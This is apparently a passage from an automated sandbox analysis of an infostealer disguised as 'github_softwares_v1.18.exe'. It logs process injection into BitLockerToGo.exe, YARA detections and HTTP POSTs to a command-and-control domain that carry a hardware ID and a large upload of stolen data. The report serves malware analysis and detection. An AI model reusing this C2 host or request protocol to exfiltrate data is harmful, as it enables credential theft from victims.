                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:10 UTC1279OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e
                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
                    2024-07-26 18:34:11 UTC804INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: PHPSESSID=nnlf87j7kf7mhg9hlsn4sso5mj; expires=Tue, 19-Nov-2024 12:20:50 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwRkXA4Ou1hTROEg1eXPxSxukioNjVevVC1FTEtZhxDcvOlzm6TWPCDFJ%2BP2hFr6CIYS6QdzTbRScaPRWHG3kkaJqloChniDzNueMkfFF%2B5JmAsnGBacjlA3%2BBT6IlqgH%2F1YR2g%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b7aec4442ad-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-26 18:34:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                    Data Ascii: eok 8.46.123.33
                    2024-07-26 18:34:11 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449737172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:12 UTC285OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 550577
                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e
                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C1C8ED1B4D45BA5AA4DCB45589FA5CFC--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@koln
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28 a9 ca
                    Data Ascii: Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da 61 da
                    Data Ascii: acC|.-NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{a
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e 62 4c
                    Data Ascii: (iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>bL
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15 02 b7
                    Data Ascii: 4Q,I=.iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^g=1J
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec dd 26
                    Data Ascii: )ITL#}{(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S.q=D&
                    2024-07-26 18:34:12 UTC15331OUTData Raw: a8 d5 e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6 e7 c9 be bc b3 32 71 86
                    Data Ascii: nT8!(.jrGx;<Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u02q
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 2f 0b 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76 3f f9 04 74 1e e1 c4 d8
                    Data Ascii: /BJGlz;m#(aobSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v?t
                    2024-07-26 18:34:12 UTC15331OUTData Raw: 84 33 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d 9f cd 49 a0 0b 08 fc 9a
                    Data Ascii: 3vs]|.kOT4V*=Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9dSeK5:t(mI
                    2024-07-26 18:34:12 UTC15331OUTData Raw: da 6b 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59 b3 7d 15 dc f7 92 41 4e
                    Data Ascii: k|#'#/oJNZ~!kgI:KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y}AN
                    2024-07-26 18:34:15 UTC812INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: PHPSESSID=2jv7nc32rsdck9v5skavgp078p; expires=Tue, 19-Nov-2024 12:20:53 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xp58e4XWvQPpU0WoO3LCw%2Bpsmul14f6fxm3CTXSaBWrx%2Bk9qlsoRe%2Fp%2FJ2Wzw5t1rFJrt%2BS1%2F%2FTA8A6ygGpvdWsY4zb0zsmoo09f98cGWN7v%2BV7I1o2JXaNuPARzk4B0m9iNTMY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b853fa94381-EWR
                    alt-svc: h3=":443"; ma=86400


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449738172.67.159.2434437056C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    TimestampBytes transferredDirectionData
                    2024-07-26 18:34:16 UTC266OUTPOST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 87
                    Host: weaknessmznxo.shop
                    2024-07-26 18:34:16 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 40 6b 6f 6c 6e 61 75 73 67 62 26 6a 3d 26 68 77 69 64 3d 43 31 43 38 45 44 31 42 34 44 34 35 42 41 35 41 41 34 44 43 42 34 35 35 38 39 46 41 35 43 46 43
                    Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--@kolnausgb&j=&hwid=C1C8ED1B4D45BA5AA4DCB45589FA5CFC
                    2024-07-26 18:34:17 UTC798INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 18:34:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Set-Cookie: PHPSESSID=ujh4u9nfg6cana4ps4mno068ij; expires=Tue, 19-Nov-2024 12:20:55 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P9cwA95zUpvsUmhya9bpZ48CPoqVzGW7QtQI2xw7nuhSTHNHnxt7OhAshe2XbcxoX835OEfBjBfzHmsGuKwL3CpszP6gvncE0THS9vE%2FcwXLvkt5Sxc94P3r22c4vCyRapflzaU%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a967b9c7df2c328-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-26 18:34:17 UTC54INData Raw: 33 30 0d 0a 36 54 62 61 4b 43 6f 78 51 74 79 68 73 7a 78 47 45 4f 69 7a 2b 6c 61 2b 50 56 67 44 37 35 66 52 42 66 4d 64 45 6f 2b 41 55 78 71 79 61 77 3d 3d 0d 0a
                    Data Ascii: 306TbaKCoxQtyhszxGEOiz+la+PVgD75fRBfMdEo+AUxqyaw==
                    2024-07-26 18:34:17 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:14:33:58
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\github_softwares_v1.18.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\github_softwares_v1.18.exe"
                    Imagebase:0x7ff764030000
                    File size:30'190'080 bytes
                    MD5 hash:444CF08B351822E4BEC5C4C1B9324942
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Go lang
                    Yara matches:
                    • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:14:34:02
                    Start date:26/07/2024
                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    Imagebase:0x5e0000
                    File size:231'736 bytes
                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:16.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:44.4%
                      Total number of Nodes:430
                      Total number of Limit Nodes:39
                      execution_graph 12456 2a39e22 12457 2a39e4a 12456->12457 12458 2a39eae 12457->12458 12463 2a39870 LdrInitializeThunk 12457->12463 12461 2a39f5e 12458->12461 12462 2a39870 LdrInitializeThunk 12458->12462 12462->12461 12463->12458 12464 2a328aa 12467 2a3be40 12464->12467 12466 2a328da 12469 2a3be60 12467->12469 12468 2a3bfce 12468->12466 12469->12468 12471 2a39870 LdrInitializeThunk 12469->12471 12471->12468 12656 2a3a269 12657 2a3a291 12656->12657 12658 2a3a2fe 12657->12658 12662 2a39870 LdrInitializeThunk 12657->12662 12661 2a39870 LdrInitializeThunk 12658->12661 12661->12658 12662->12658 12669 2a122ea 12670 2a122f0 12669->12670 12675 2a123a0 12670->12675 12676 2a16a60 12670->12676 12672 2a1324b 12673 2a09fa0 GetVolumeInformationW RtlFreeHeap LdrInitializeThunk 12672->12673 12674 2a13255 12673->12674 12677 2a16a80 12676->12677 12677->12677 12678 2a3be40 LdrInitializeThunk 12677->12678 12679 2a16c5a 12678->12679 12472 2a108af 12473 2a1082e GetSystemDirectoryW 12472->12473 12475 2a107ac 12472->12475 12473->12475 12474 2a107b1 GetSystemDirectoryW 12474->12475 12475->12472 12475->12473 12475->12474 12476 2a37eb0 RtlFreeHeap 12475->12476 12476->12475 12680 2a29ef2 12681 2a29f10 12680->12681 12685 2a2a0ce 12680->12685 12681->12685 12686 2a39870 LdrInitializeThunk 12681->12686 12683 2a2ab27 12683->12683 12684 2a2ab1b FreeLibrary 12684->12683 12685->12683 12685->12684 12686->12685 12687 2a17671 12688 2a17800 12687->12688 12689 2a17923 12687->12689 12691 2a1783e 12687->12691 12693 2a17681 12687->12693 12696 2a17c90 12688->12696 12692 2a02a00 RtlFreeHeap 12689->12692 12691->12691 12692->12691 12694 2a3c020 LdrInitializeThunk 12693->12694 12695 2a177f1 12694->12695 12695->12688 12695->12689 12695->12691 12697 2a17923 12696->12697 12699 2a1796c 12696->12699 12698 2a02a00 RtlFreeHeap 12697->12698 12698->12699 12699->12691 12477 2a20433 12480 2a3c680 12477->12480 12481 2a3c6a0 12480->12481 12482 2a20449 12481->12482 12484 2a39870 LdrInitializeThunk 12481->12484 12484->12482 12700 2a1baf0 12702 2a1bafe 12700->12702 12705 2a1bb40 12700->12705 12702->12702 12706 2a1bc00 12702->12706 12703 2a1bbbc 12703->12705 12710 2a19b40 12703->12710 12707 2a1bc5d 12706->12707 12707->12707 12708 2a3c020 LdrInitializeThunk 12707->12708 12709 2a1bd4d 12708->12709 12709->12703 12711 2a19c0a 12710->12711 12712 2a166c0 LdrInitializeThunk 12711->12712 12713 2a19c77 12712->12713 12714 2a166c0 LdrInitializeThunk 12713->12714 12715 2a19dbd 12714->12715 12716 2a166c0 LdrInitializeThunk 12715->12716 12717 2a19f0f 12716->12717 12718 2a166c0 LdrInitializeThunk 12717->12718 12719 2a1a092 12718->12719 12720 2a166c0 LdrInitializeThunk 12719->12720 12721 2a1a206 12720->12721 12722 2a166c0 LdrInitializeThunk 12721->12722 12723 2a1a313 12722->12723 12724 2a203f0 12725 2a203fd 12724->12725 12728 2a3c7e0 12725->12728 12730 2a3c81b 12728->12730 12729 2a20424 12732 2a3c87e 12730->12732 12736 2a39870 LdrInitializeThunk 12730->12736 12732->12729 12735 2a3c978 12732->12735 12737 2a39870 LdrInitializeThunk 12732->12737 12733 2a37eb0 RtlFreeHeap 12733->12729 12735->12733 12736->12732 12737->12735 12738 2a10375 12739 2a01e80 2 API calls 12738->12739 12740 2a102c9 12739->12740 12740->12738 12741 2a10389 12740->12741 12742 2a10528 12740->12742 12743 2a02a00 RtlFreeHeap 12742->12743 12744 2a10680 12743->12744 12745 2a09fa0 3 API calls 12744->12745 12746 2a106a3 12745->12746 12747 2a09fa0 3 API calls 12746->12747 12748 2a106c3 12747->12748 12771 2a20250 12748->12771 12750 2a106d9 12751 2a09fa0 3 API calls 12750->12751 12752 2a106e3 12751->12752 12777 2a22c10 12752->12777 12758 2a10715 12759 2a09fa0 3 API calls 12758->12759 12760 2a10735 12759->12760 12792 2a27970 12760->12792 12762 2a1074b 12832 2a2f370 12762->12832 12765 2a10764 12767 2a09fa0 3 API calls 12765->12767 12768 2a10773 12767->12768 12815 2a34340 12768->12815 12772 2a20263 12771->12772 12772->12772 12773 2a3c680 LdrInitializeThunk 12772->12773 12774 2a20379 12773->12774 12774->12774 12776 2a20225 12774->12776 12843 2a3cab0 12774->12843 12776->12750 12779 2a22c55 12777->12779 12778 2a10702 12785 2a230b0 12778->12785 12781 2a22cce 12779->12781 12853 2a39870 LdrInitializeThunk 12779->12853 12781->12778 12784 2a22dbe 12781->12784 12854 2a39870 LdrInitializeThunk 12781->12854 12782 2a37eb0 RtlFreeHeap 12782->12778 12784->12782 12855 2a230d0 12785->12855 12787 2a1070b 12788 2a09fa0 12787->12788 12789 2a09fb5 12788->12789 12791 2a0a007 12788->12791 12790 2a34340 3 API calls 12789->12790 12790->12791 12791->12758 12794 2a2798b 12792->12794 12793 2a28542 12793->12762 